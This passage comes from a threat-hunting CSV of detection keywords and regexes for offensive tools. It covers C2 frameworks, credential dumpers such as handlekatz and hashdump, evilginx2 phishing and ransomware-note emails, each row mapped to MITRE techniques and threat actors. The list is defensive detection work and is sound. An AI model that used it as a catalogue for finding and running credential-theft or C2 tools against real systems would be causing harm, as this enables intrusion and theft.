TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","1","N/A","N/A","10","1","39","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z","46973" "*Hak5 Cloud C*",".{0,1000}Hak5\sCloud\sC\?.{0,1000}","offensive_tool_keyword","Hak5 Cloud C2","Hak5 Cloud C2 web title","T1071.001","TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","46974" "*hak5/omg-payloads*",".{0,1000}hak5\/omg\-payloads.{0,1000}","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","46975" "*hakaioffsec/CVE-2024-21338*",".{0,1000}hakaioffsec\/CVE\-2024\-21338.{0,1000}","offensive_tool_keyword","POC","Local Privilege Escalation from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled.","T1055.011 - T1548.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/hakaioffsec/CVE-2024-21338","1","1","N/A","N/A","9","3","292","60","2024-04-16T21:00:14Z","2024-04-13T05:53:02Z","46976" "*haKCers.txt*",".{0,1000}haKCers\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","46977" "*hakivvi/proxylogon*",".{0,1000}hakivvi\/proxylogon.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://github.com/hakivvi/proxylogon","1","1","N/A","N/A","10","1","20","6","2022-04-23T03:21:44Z","2021-03-14T13:04:07Z","46978" "*hakluke/hakrawler*",".{0,1000}hakluke\/hakrawler.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/hakluke/hakrawler","1","1","#linux","N/A","6","10","4683","520","2024-12-21T20:40:03Z","2019-12-15T13:54:43Z","46979" "*hakrawler -*",".{0,1000}hakrawler\s\-.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/hakluke/hakrawler","1","0","#linux","N/A","6","10","4683","520","2024-12-21T20:40:03Z","2019-12-15T13:54:43Z","46980" "*hakrawler.go*",".{0,1000}hakrawler\.go.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast 
web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/hakluke/hakrawler","1","1","#linux","N/A","6","10","4683","520","2024-12-21T20:40:03Z","2019-12-15T13:54:43Z","46981" "*hakrawler@latest*",".{0,1000}hakrawler\@latest.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/hakluke/hakrawler","1","0","#linux","N/A","6","10","4683","520","2024-12-21T20:40:03Z","2019-12-15T13:54:43Z","46982" "*hakrawler-ip-range*",".{0,1000}hakrawler\-ip\-range.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","46983" "*hakrawler-master*",".{0,1000}hakrawler\-master.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/hakluke/hakrawler","1","1","#linux","N/A","6","10","4683","520","2024-12-21T20:40:03Z","2019-12-15T13:54:43Z","46984" "*haktrails subdomains*",".{0,1000}haktrails\ssubdomains.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/hakluke/hakrawler","1","0","#linux","N/A","6","10","4683","520","2024-12-21T20:40:03Z","2019-12-15T13:54:43Z","46985" 
"*Hakumarachi/Bropper*",".{0,1000}Hakumarachi\/Bropper.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Hakumarachi/Bropper","1","1","N/A","N/A","8","3","201","19","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z","46986" "*halielang@protonmail.com*",".{0,1000}halielang\@protonmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","46987" "*Halo's Gate and Tartarus' Gate Patch for `syscall` instruction rather than `SSN`*",".{0,1000}Halo\'s\sGate\sand\sTartarus\'\sGate\sPatch\sfor\s\`syscall\`\sinstruction\srather\sthan\s\`SSN\`.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","0","#content","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","46988" "*handelsregister-get-company-names *",".{0,1000}handelsregister\-get\-company\-names\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","46989" "*handle_nessus_file*",".{0,1000}handle_nessus_file.{0,1000}","offensive_tool_keyword","crackmapexec","function name from nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","46990" "*handlekatz.py*",".{0,1000}handlekatz\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","46991" "*handlekatz.x64.*",".{0,1000}handlekatz\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 
- T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com//EspressoCake/HandleKatz_BOF","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","46992" "*handlekatz_bof.*",".{0,1000}handlekatz_bof\..{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - 
CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com//EspressoCake/HandleKatz_BOF","1","1","N/A","N/A","10","","N/A","","","","46993" "*handlekatz_dump*",".{0,1000}handlekatz_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","46994" "*HANDLEKATZ_EXE_NAME=*",".{0,1000}HANDLEKATZ_EXE_NAME\=.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","46995" "*handlePhishlets*",".{0,1000}handlePhishlets.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#linux 
#content","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","46996" "*handshake*jasmin@123*",".{0,1000}\""handshake\"",\s\""jasmin\@123\"".{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","46997" "*Hangingsword/HouQing*",".{0,1000}Hangingsword\/HouQing.{0,1000}","offensive_tool_keyword","cobaltstrike","Hou Qing-Advanced AV Evasion Tool For Red Team Ops","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - 
Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Hangingsword/HouQing","1","1","N/A","N/A","10","10","205","60","2021-01-14T08:38:12Z","2021-01-14T07:13:21Z","46998" "*Happy Hacking*Enjoy Dump!*",".{0,1000}Happy\sHacking.{0,1000}Enjoy\sDump!.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","46999" "*Happycat@cyberfear.com*",".{0,1000}Happycat\@cyberfear\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","47000" "*HardHatC2*",".{0,1000}HardHatC2.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","47001" "*hardhatc2.com*",".{0,1000}hardhatc2\.com.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","47002" "*HardHatC2Client*",".{0,1000}HardHatC2Client.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","47003" 
"*HarmJ0y/DAMP*",".{0,1000}HarmJ0y\/DAMP.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","N/A","10","4","378","79","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z","47004" "*HarvestBrowserPasswords.exe*",".{0,1000}HarvestBrowserPasswords\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","47005" "*HarvestBrowserPasswords.pdb*",".{0,1000}HarvestBrowserPasswords\.pdb.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","47006" "*harvestcrop.exe * 
*",".{0,1000}harvestcrop\.exe\s.{0,1000}\s.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","N/A","10","4","379","61","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z","47007" "*has no pre auth required. Dumping hash to crack offline:*",".{0,1000}has\sno\spre\sauth\srequired\.\sDumping\shash\sto\scrack\soffline\:.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","47008" "*HasAutoAdminLogonCredentials*",".{0,1000}HasAutoAdminLogonCredentials.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","0","N/A","AD Enumeration","10","10","1908","184","2025-03-25T13:01:45Z","2020-10-07T10:07:22Z","47009" "*hash3liZer/SillyRAT*",".{0,1000}hash3liZer\/SillyRAT.{0,1000}","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hash3liZer/SillyRAT","1","1","N/A","N/A","N/A","10","792","162","2023-12-09T00:42:07Z","2020-05-10T17:37:37Z","47010" "*hash3liZer/wifijammer*",".{0,1000}hash3liZer\/wifijammer.{0,1000}","offensive_tool_keyword","wifijammer","wifijammer","T1497 - T1498 - T1499","TA0040","N/A","N/A","Sniffing & 
Spoofing","https://github.com/hash3liZer/wifijammer","1","1","N/A","N/A","N/A","3","202","44","2021-06-10T12:33:49Z","2018-01-20T16:26:45Z","47011" "*Hash-Buster*",".{0,1000}Hash\-Buster.{0,1000}","offensive_tool_keyword","Hash-Buster","hash cracking tool ","T1201 - T1110 - T1021","TA0001 - TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/s0md3v/Hash-Buster","1","1","N/A","N/A","N/A","10","1809","401","2024-12-10T13:50:26Z","2017-07-03T17:28:51Z","47012" "*hashcat*",".{0,1000}hashcat.{0,1000}","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","Black Basta","Credential Access","https://github.com/hashcat/hashcat","1","0","#linux","N/A","10","10","22481","3046","2024-08-16T23:50:35Z","2015-12-04T14:46:51Z","47013" "*hashcat-*.7z*",".{0,1000}hashcat\-.{0,1000}\.7z.{0,1000}","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","Black Basta","Credential Access","https://github.com/hashcat/hashcat","1","1","#linux","N/A","10","10","22481","3046","2024-08-16T23:50:35Z","2015-12-04T14:46:51Z","47014" "*hashcat.git*",".{0,1000}hashcat\.git.{0,1000}","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","Black Basta","Credential Access","https://github.com/hashcat/hashcat","1","1","#linux","N/A","10","10","22481","3046","2024-08-16T23:50:35Z","2015-12-04T14:46:51Z","47015" "*hashcat/hashcat*",".{0,1000}hashcat\/hashcat.{0,1000}","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","Black Basta","Credential 
Access","https://github.com/hashcat/hashcat","1","1","#linux","N/A","10","10","22481","3046","2024-08-16T23:50:35Z","2015-12-04T14:46:51Z","47016" "*hashcat-rule-master*",".{0,1000}hashcat\-rule\-master.{0,1000}","offensive_tool_keyword","hashcat-rule","Rule for hashcat or john. Aiming to crack how people generate their password","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/clem9669/hashcat-rule","1","1","#linux","N/A","10","5","435","47","2024-09-02T20:14:15Z","2020-03-06T17:20:40Z","47017" "*hashdump.py*",".{0,1000}hashdump\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","47018" "*hashdump.rb*",".{0,1000}hashdump\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","47019" "*hashdump.x64.dll*",".{0,1000}hashdump\.x64\.dll.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","47020" "*hashdump_sam*",".{0,1000}hashdump_sam.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","47021" "*HashDumpDCImplant*",".{0,1000}HashDumpDCImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","47022" "*HashDumpSAMImplant*",".{0,1000}HashDumpSAMImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
